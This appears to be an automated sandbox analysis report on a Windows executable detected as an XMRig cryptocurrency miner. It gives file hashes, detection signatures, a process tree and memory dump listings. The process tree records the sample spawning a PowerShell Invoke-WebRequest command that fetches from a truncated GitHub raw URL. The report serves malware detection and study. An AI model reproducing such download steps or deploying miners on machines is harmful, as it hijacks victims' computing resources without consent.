Analysis

  • max time kernel
    110s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 19:35

General

  • Target

    3ea06f03a74f0f7443376fb35555171c4656912ece517ca8e2d3a5893b867c52.exe

  • Size

    1.3MB

  • MD5

    d67579b6e5b3a9c10ae130fb475f27ce

  • SHA1

    b45953bade2749aeb93594a492fd7cfa183f2c42

  • SHA256

    3ea06f03a74f0f7443376fb35555171c4656912ece517ca8e2d3a5893b867c52

  • SHA512

    b82c3b7da42e2f0e5500439c88f74bdc152da849f6dda9ff7a58565358a9ca8e1d2f9fd74ff7d322d741c5af0df80784ee4ed4409f3b0f06ee511ab99c7e702a

  • SSDEEP

    24576:zv3/fTLF671TilQFG4P5PMkibTJH+2Q/ynKeWYRLZcyZ204oVTUG7N4b:Lz071uv4BPMkibTIA5JnJ1y

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ea06f03a74f0f7443376fb35555171c4656912ece517ca8e2d3a5893b867c52.exe
    "C:\Users\Admin\AppData\Local\Temp\3ea06f03a74f0f7443376fb35555171c4656912ece517ca8e2d3a5893b867c52.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2064

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2064-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2064-6-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

    Filesize

    4KB

  • memory/2064-13-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2064-7-0x000000001B820000-0x000000001BB02000-memory.dmp

    Filesize

    2.9MB

  • memory/2064-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2064-8-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

  • memory/2064-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2064-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2064-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

    Filesize

    9.6MB

  • memory/2292-26-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-20-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-1-0x00000000000F0000-0x0000000000100000-memory.dmp

    Filesize

    64KB

  • memory/2292-0-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-17-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-18-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-19-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-16-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-21-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-22-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-23-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-24-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-25-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB

  • memory/2292-15-0x000000013F860000-0x000000013FC52000-memory.dmp

    Filesize

    3.9MB